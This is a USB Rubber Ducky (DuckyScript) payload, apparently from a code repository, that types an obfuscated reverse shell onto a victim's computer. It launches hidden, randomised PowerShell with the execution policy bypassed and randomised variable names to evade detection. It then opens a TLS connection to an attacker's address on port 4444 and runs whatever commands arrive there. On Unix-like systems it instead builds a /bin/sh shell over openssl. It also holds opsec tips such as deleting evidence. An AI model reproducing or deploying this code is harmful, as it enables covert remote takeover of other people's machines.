ELSE IF ($RANDOM_PS == 5) THEN
|
||||||
|
STRING cmd /c "Powe%ALLUSERSPROFILE:~4,1%Shell -NoPr -NonI -w hi"
|
||||||
|
ELSE IF ($RANDOM_PS == 6) THEN
|
||||||
|
STRING cmd /c "p^Owe%ALLUSERSPROFILE:~7,1%Shell /NoPr /Nonin /wind hidD"
|
||||||
|
ELSE IF ($RANDOM_PS == 7) THEN
|
||||||
|
STRING cmd.exe /c "P%PSModulePath:~21,1%werShell -NoPr -NonI -w hi"
|
||||||
|
ELSE IF ($RANDOM_PS == 8) THEN
|
||||||
|
STRING powershell -NoPro -noninT -win h
|
||||||
|
ELSE IF ($RANDOM_PS == 9) THEN
|
||||||
|
STRING cmd /c "p^Owe%ALLUSERSPROFILE:~7,1%Shell -NoP -Noni -wind hidD"
|
||||||
|
ELSE IF ($RANDOM_PS == 2) THEN
|
||||||
|
STRING powershell.exe -NoP -nOni -W h
|
||||||
|
ELSE IF ($RANDOM_PS == 10) THEN
|
||||||
|
STRING cmd /c "FOR /F "delims=s\ tokens=4" %a IN ('set^|findstr PSM')DO %a -nop -noni -w H"
|
||||||
|
ELSE IF ($RANDOM_PS == 11) THEN
|
||||||
|
STRING powershell -nopr -noninT -W HiddEn
|
||||||
|
ELSE IF ($RANDOM_PS == 12) THEN
|
||||||
|
STRING cmd.exe /c "FOR /F "delims=s\ tokens=4" %a IN ('set^|findstr PSM')DO %a -noProF -nonin -win Hi"
|
||||||
|
ELSE IF ($RANDOM_PS == 13) THEN
|
||||||
|
STRING cmd /c "P%PSModulePath:~25,1%weRShell -noProf -NonIn -wi h"
|
||||||
|
ELSE IF ($RANDOM_PS == 14) THEN
|
||||||
|
STRING powershell -noproF -noni -W Hi
|
||||||
|
ELSE IF ($RANDOM_PS == 15) THEN
|
||||||
|
STRING cmd /c "Powe%ALLUSERSPROFILE:~4,1%Shell /NoPr /NonI /%PSModulePath:~17,1% hi"
|
||||||
|
ELSE ($RANDOM_PS == 16) THEN
|
||||||
|
STRING powershell.exe -noP -nOnI -windo H
|
||||||
|
END_IF
|
||||||
|
|
||||||
|
IF_DEFINED_TRUE #EXECUTIONPOLICY
|
||||||
|
SPACE
|
||||||
|
IF (($RANDOM_PS % 2) == 0) THEN
|
||||||
|
STRING -ep ByPasS
|
||||||
|
ELSE IF (($RANDOM_PS % 5) == 0) THEN
|
||||||
|
STRING -exec bypass
|
||||||
|
ELSE IF (($RANDOM_PS % 7) == 0) THEN
|
||||||
|
STRING -exeC byPasS
|
||||||
|
ELSE IF (($RANDOM_PS % 10) == 0) THEN
|
||||||
|
STRING -exEcUtionPoL bYpaSs
|
||||||
|
ELSE IF (($RANDOM_PS % 12) == 0) THEN
|
||||||
|
STRING -exEcUtion bYPaSs
|
||||||
|
ELSE
|
||||||
|
STRING -eP BYPaSs
|
||||||
|
END_IF
|
||||||
|
END_IF_DEFINED
|
||||||
|
ENTER
|
||||||
|
DELAY #DELAY
|
||||||
|
END_FUNCTION
|
||||||
|
REM EXAMPLE USAGE AFTER EXTENSION
|
||||||
|
REM DELAY 2000
|
||||||
|
REM GUI r
|
||||||
|
REM DELAY 2000
|
||||||
|
REM Rolling_Powershell_Execution()
|
||||||
|
END_EXTENSION
|
||||||
|
|
||||||
|
REM Define the attackers IP, Port and Identifier
|
||||||
|
DEFINE #ADDRESS '0.0.0.0'
|
||||||
|
DEFINE #PORT 4444
|
||||||
|
DEFINE #IDENTIFIER Ducky
|
||||||
|
REM Automatic setup requires openssl!
|
||||||
|
DEFINE #SETUP FALSE
|
||||||
|
|
||||||
|
REM Automatic setup and start listener - Requires openssl!
|
||||||
|
IF_DEFINED #SETUP
|
||||||
|
IF ($_OS == #NOT_WINDOWS) THEN
|
||||||
|
DELAY 1500
|
||||||
|
STRINGLN echo "Setting up Infrastructre - Do not interact!"
|
||||||
|
DELAY 1000
|
||||||
|
STRINGLN openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes && echo "Setup complete! Starting listener on Port #PORT " && openssl s_server -quiet -key key.pem -cert cert.pem -port #PORT
|
||||||
|
ELSE
|
||||||
|
DELAY 1500
|
||||||
|
GUI r
|
||||||
|
DELAY 1000
|
||||||
|
STRINGLN notepad.exe
|
||||||
|
DELAY 250
|
||||||
|
STRING Setup requires an unix based machine with openssl installed!
|
||||||
|
END_IF
|
||||||
|
ELSE_DEFINED
|
||||||
|
IF ($_OS == WINDOWS) THEN
|
||||||
|
|
||||||
|
REM Pseudo random variables for layer one polymorphism
|
||||||
|
VAR $var_gibberish = $_RANDOM_NUMBER_KEYCODE
|
||||||
|
VAR $var_gibberish2 = $_RANDOM_LETTER_KEYCODE
|
||||||
|
VAR $var_gibberish3 = $_RANDOM_LOWER_LETTER_KEYCODE
|
||||||
|
VAR $var_gibberish4 = $_RANDOM_LETTER_KEYCODE
|
||||||
|
VAR $var_gibb3rish = $_RANDOM_NUMBER_KEYCODE
|
||||||
|
VAR $var_gIbberish5 = $_RANDOM_UPPER_LETTER_KEYCODE
|
||||||
|
VAR $var_gibberish6 = $_RANDOM_NUMBER_KEYCODE
|
||||||
|
VAR $var_gibBerish1 = $_RANDOM_NUMBER_KEYCODE
|
||||||
|
|
||||||
|
REM Layer two polymorphism
|
||||||
|
VAR $RANDOM_LAYER = $_RANDOM_INT
|
||||||
|
|
||||||
|
REM Polymorphism function
|
||||||
|
FUNCTION Polymorphism()
|
||||||
|
IF (($RANDOM_LAYER % 2) == 0) THEN
|
||||||
|
STRING $
|
||||||
|
INJECT_VAR $var_gibberish
|
||||||
|
INJECT_VAR $var_gibberish2
|
||||||
|
INJECT_VAR $var_gibberish3
|
||||||
|
INJECT_VAR $var_gibberish3
|
||||||
|
INJECT_VAR $var_gibberish4
|
||||||
|
INJECT_VAR $var_gIbberish5
|
||||||
|
ELSE IF (($RANDOM_LAYER % 6) == 0) THEN
|
||||||
|
STRING $
|
||||||
|
INJECT_VAR $var_gibberish
|
||||||
|
INJECT_VAR $var_gibberish2
|
||||||
|
INJECT_VAR $var_gibberish
|
||||||
|
INJECT_VAR $var_gibberish3
|
||||||
|
INJECT_VAR $var_gibberish4
|
||||||
|
INJECT_VAR $var_gibberish
|
||||||
|
ELSE
|
||||||
|
STRING $
|
||||||
|
INJECT_VAR $var_gibberish4
|
||||||
|
INJECT_VAR $var_gibberish
|
||||||
|
INJECT_VAR $var_gibberish2
|
||||||
|
INJECT_VAR $var_gibberish3
|
||||||
|
INJECT_VAR $var_gibberish
|
||||||
|
INJECT_VAR $var_gibberish4
|
||||||
|
END_IF
|
||||||
|
END_FUNCTION
|
||||||
|
|
||||||
|
REM Polymorphism function
|
||||||
|
FUNCTION Polymorphism2()
|
||||||
|
IF (($RANDOM_LAYER % 6) == 0) THEN
|
||||||
|
STRING $
|
||||||
|
INJECT_VAR $var_gibberish
|
||||||
|
INJECT_VAR $var_gibberish2
|
||||||
|
INJECT_VAR $var_gibberish3
|
||||||
|
INJECT_VAR $var_gibberish3
|
||||||
|
INJECT_VAR $var_gibberish4
|
||||||
|
INJECT_VAR $var_gIbberish5
|
||||||
|
INJECT_VAR $var_gIbberish5
|
||||||
|
ELSE IF (($RANDOM_LAYER % 9) == 0) THEN
|
||||||
|
STRING $
|
||||||
|
INJECT_VAR $var_gibberish
|
||||||
|
INJECT_VAR $var_gIbberish5
|
||||||
|
INJECT_VAR $var_gibberish2
|
||||||
|
INJECT_VAR $var_gibberish
|
||||||
|
INJECT_VAR $var_gibberish3
|
||||||
|
INJECT_VAR $var_gibberish4
|
||||||
|
INJECT_VAR $var_gibberish
|
||||||
|
ELSE
|
||||||
|
STRING $
|
||||||
|
INJECT_VAR $var_gibberish4
|
||||||
|
INJECT_VAR $var_gibberish
|
||||||
|
INJECT_VAR $var_gibberish2
|
||||||
|
INJECT_VAR $var_gibberish3
|
||||||
|
INJECT_VAR $var_gibberish6
|
||||||
|
INJECT_VAR $var_gibberish4
|
||||||
|
INJECT_VAR $var_gIbberish5
|
||||||
|
END_IF
|
||||||
|
END_FUNCTION
|
||||||
|
|
||||||
|
REM Polymorphism function
|
||||||
|
FUNCTION Polymorphism3()
|
||||||
|
IF (($RANDOM_LAYER % 1) == 0) THEN
|
||||||
|
STRING $
|
||||||
|
INJECT_VAR $var_gibberish
|
||||||
|
INJECT_VAR $var_gibberish2
|
||||||
|
INJECT_VAR $var_gIbberish5
|
||||||
|
ELSE IF (($RANDOM_LAYER % 8) == 0) THEN
|
||||||
|
STRING $
|
||||||
|
INJECT_VAR $var_gibberish
|
||||||
|
INJECT_VAR $var_gIbberish5
|
||||||
|
INJECT_VAR $var_gibberish
|
||||||
|
ELSE
|
||||||
|
STRING $
|
||||||
|
INJECT_VAR $var_gibberish4
|
||||||
|
INJECT_VAR $var_gibberish
|
||||||
|
INJECT_VAR $var_gIbberish5
|
||||||
|
END_IF
|
||||||
|
END_FUNCTION
|
||||||
|
|
||||||
|
REM Polymorphism function
|
||||||
|
FUNCTION Polymorphism4()
|
||||||
|
IF (($RANDOM_LAYER % 1) == 0) THEN
|
||||||
|
STRING $
|
||||||
|
INJECT_VAR $var_gIbberish5
|
||||||
|
INJECT_VAR $var_gibberish
|
||||||
|
INJECT_VAR $var_gibberish2
|
||||||
|
INJECT_VAR $var_gibb3rish
|
||||||
|
ELSE IF (($RANDOM_LAYER % 8) == 0) THEN
|
||||||
|
STRING $
|
||||||
|
INJECT_VAR $var_gibBerish1
|
||||||
|
INJECT_VAR $var_gibberish
|
||||||
|
INJECT_VAR $var_gIbberish5
|
||||||
|
INJECT_VAR $var_gibberish
|
||||||
|
ELSE
|
||||||
|
STRING $
|
||||||
|
INJECT_VAR $var_gibberish6
|
||||||
|
INJECT_VAR $var_gibberish4
|
||||||
|
INJECT_VAR $var_gibberish
|
||||||
|
INJECT_VAR $var_gIbberish5
|
||||||
|
END_IF
|
||||||
|
END_FUNCTION
|
||||||
|
|
||||||
|
REM Connection Message
|
||||||
|
FUNCTION Quack_Slogan()
|
||||||
|
IF (($RANDOM_LAYER % 2) == 0) THEN
|
||||||
|
STRING "[!] Quack you $env:USERNAME/$env:COMPUTERNAME! `n[?] Opsec Tip: Use environment variables.`n`n"
|
||||||
|
ELSE IF (($RANDOM_LAYER % 3) == 0) THEN
|
||||||
|
STRING "[!] $env:USERNAME/$env:COMPUTERNAME got found a flash drive... `n[?] Considere converting IPs to decimal (e.g. 127.0.0.1 = 2130706433)`n`n"
|
||||||
|
ELSE IF (($RANDOM_LAYER % 4) == 0) THEN
|
||||||
|
STRING "[!] $env:USERNAME/$env:COMPUTERNAME compromised by #IDENTIFIER `n[+] Ducks > D0lphins!`n`n"
|
||||||
|
ELSE IF (($RANDOM_LAYER % 6) == 0) THEN
|
||||||
|
STRING "[!] Quack Attack on $env:USERNAME/$env:COMPUTERNAME `n[+] Sometimes it is better to wait...Be patient!`n`n"
|
||||||
|
ELSE IF (($RANDOM_LAYER % 8) == 0) THEN
|
||||||
|
STRING "[!] Established remote access on $env:USERNAME/$env:COMPUTERNAME `n[?] Watch out for powershell -v 2!`n`n"
|
||||||
|
ELSE IF (($RANDOM_LAYER % 9) == 0) THEN
|
||||||
|
STRING "[!] $env:USERNAME/$env:COMPUTERNAME messed with the Duck `n[?] Remember to delete evidence.`n`n"
|
||||||
|
ELSE
|
||||||
|
STRING "[!] $env:USERNAME/$env:COMPUTERNAME says Quack! `n[+]...and then he waddled away...`n`n"
|
||||||
|
END_IF
|
||||||
|
END_FUNCTION
|
||||||
|
|
||||||
|
GUI r
|
||||||
|
DELAY 500
|
||||||
|
Rolling_Powershell_Execution()
|
||||||
|
DELAY 300
|
||||||
|
Polymorphism()
|
||||||
|
STRING =[Text.Encoding]::UTF8.GetBytes(
|
||||||
|
Quack_Slogan()
|
||||||
|
STRING );
|
||||||
|
Polymorphism2()
|
||||||
|
REM Section were Address & Port get reflected
|
||||||
|
STRING =New-Object Net.Sockets.TcpClient( #ADDRESS , #PORT );
|
||||||
|
STRING $s=
|
||||||
|
Polymorphism2()
|
||||||
|
STRING .GetStream();
|
||||||
|
STRING $sSL=New-Object System.Net.Security.SslStream($s,$false,({$True} -as [Net.Security.RemoteCertificateValidationCallback]));
|
||||||
|
STRING $sSL.AuthenticateAsClient('madeby.0iphor13', $null, "Tls12", $false);
|
||||||
|
Polymorphism3()
|
||||||
|
STRING =new-object System.IO.StreamWriter($sSL);
|
||||||
|
STRING $sSL.write(
|
||||||
|
Polymorphism()
|
||||||
|
STRING ,0,
|
||||||
|
Polymorphism()
|
||||||
|
STRING .Length);
|
||||||
|
Polymorphism3()
|
||||||
|
STRING .Write('
|
||||||
|
REM Identifier
|
||||||
|
STRING #IDENTIFIER
|
||||||
|
STRING @PS '+(&('g'+'l'))+'> ');
|
||||||
|
Polymorphism3()
|
||||||
|
STRING .flush();[byte[]]
|
||||||
|
Polymorphism4()
|
||||||
|
STRING = 0..65535|%{0};while(($i=$sSL.Read(
|
||||||
|
Polymorphism4()
|
||||||
|
STRING , 0,
|
||||||
|
Polymorphism4()
|
||||||
|
STRING .Length)) -ne 0){$D=(New-Object -TypeName System.Text.ASCIIEncoding).GetString(
|
||||||
|
Polymorphism4()
|
||||||
|
STRING ,0, $i);
|
||||||
|
STRING $Y=(iex $D | Out-String ) 2>&1;$X=$Y + '
|
||||||
|
REM Identifier
|
||||||
|
STRING #IDENTIFIER
|
||||||
|
STRING @PS ' + (Get-LoCatIon).Path + '> ';
|
||||||
|
STRING $Z=([text.encoding]::UTF8).GetBytes($X);$sSL.Write($Z,0,$Z.Length);
|
||||||
|
STRING $sSL.Flush()};exit
|
||||||
|
DELAY 250
|
||||||
|
ENTER
|
||||||
|
REM Indicator of successful execution
|
||||||
|
CAPSLOCK
|
||||||
|
DELAY 20
|
||||||
|
CAPSLOCK
|
||||||
|
ELSE
|
||||||
|
REM Executing reverse shell when inserted into non-windows box
|
||||||
|
REM Non-ideal solution for opening terminal (But should work for most unix distros)
|
||||||
|
DELAY 2000
|
||||||
|
INJECT_MOD COMMAND
|
||||||
|
DELAY 2000
|
||||||
|
STRING terminal
|
||||||
|
DELAY 500
|
||||||
|
ENTER
|
||||||
|
DELAY 1000
|
||||||
|
STRINGLN which screen >/dev/null && which openssl >/dev/null && screen -md sh -c 'mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect #ADDRESS:#PORT > /tmp/s; rm /tmp/s'
|
||||||
|
DELAY 1000
|
||||||
|
STRINGLN exit
|
||||||
|
END_IF
|
||||||
|
END_IF_DEFINED
|
Loading…
Reference in New Issue